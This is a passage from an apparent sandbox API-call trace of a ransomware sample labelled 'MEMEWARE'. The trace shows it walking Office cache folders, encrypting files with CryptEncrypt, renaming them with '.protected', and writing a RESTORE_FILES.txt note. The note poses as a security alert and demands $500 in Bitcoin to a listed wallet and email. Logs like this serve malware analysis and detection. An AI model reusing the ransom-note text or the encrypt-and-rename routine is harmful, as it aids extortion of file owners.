pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.545] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.551] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.551] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0058.552] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.552] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0058.552] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x750, lpOverlapped=0x0) returned 1 [0058.553] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x750, lpOverlapped=0x0) returned 1 [0058.553] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.553] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.553] CloseHandle (hObject=0xb4) returned 1 [0058.553] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0058.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0058.554] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0058.554] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0058.554] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0058.554] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0058.554] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0058.555] lstrlenA (lpString="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") returned 684 [0058.555] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0058.555] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.555] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0058.555] CloseHandle (hObject=0xa4) returned 1 [0058.555] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0058.555] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0058.555] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 66 [0058.555] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0058.555] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0058.555] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned 68 [0058.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0058.786] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.786] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.786] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0058.786] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.786] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0058.786] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0058.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.786] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.786] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.786] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.786] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.786] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0058.786] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.786] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.786] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0058.786] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0058.787] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.787] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.787] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Windows") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Program Files") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Program Files (x86)") returned -1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="$Recycle.bin") returned 1 [0058.787] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="System Volume Information") returned -1 [0058.787] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.787] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".protected") returned 0x0 [0058.787] lstrcmpW (lpString1="GrooveLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0058.787] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.787] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.787] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW 
(lpFirst="GrooveLR.cab", lpSrch=".txt") returned 0x0 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".rar") returned 0x0 [0058.788] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0058.788] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".zip") returned 0x0 [0058.788] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.789] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.789] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.789] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.789] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.808] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.808] CloseHandle (hObject=0xb4) returned 1 [0058.812] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.protected") returned 89 [0058.812] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.protected")) returned 1 [0058.813] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Windows") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Program Files") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Program Files (x86)") returned -1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="$Recycle.bin") returned 1 [0058.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="System Volume Information") returned -1 [0058.813] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.813] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".protected") returned 0x0 [0058.813] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0058.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.813] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.813] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".txt") returned 0x0 [0058.814] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".rar") returned 0x0 [0058.814] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0058.814] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".zip") returned 0x0 [0058.814] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.824] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.825] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.825] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.826] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.835] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.835] CloseHandle (hObject=0xb4) returned 1 
[0058.835] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.protected") returned 90 [0058.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.protected")) returned 1 [0058.835] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Windows") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Program Files") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Program Files (x86)") returned -1 [0058.835] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="$Recycle.bin") returned 1 [0058.836] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="System Volume Information") returned -1 [0058.836] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".protected") returned 0x0 [0058.836] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.836] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".txt") returned 0x0 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".rar") returned 0x0 [0058.836] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0058.836] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".zip") returned 0x0 [0058.836] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x391, lpOverlapped=0x0) returned 1 [0058.855] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.855] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x391, lpOverlapped=0x0) returned 1 [0058.855] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.856] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.856] WriteFile (in: hFile=0xb4, 
lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.856] CloseHandle (hObject=0xb4) returned 1 [0058.856] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.protected") returned 90 [0058.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.protected")) returned 1 [0058.856] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0058.856] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0058.856] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0058.857] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0058.857] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.857] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.857] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0058.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0058.857] StrStrW (lpFirst="Setup.xml", 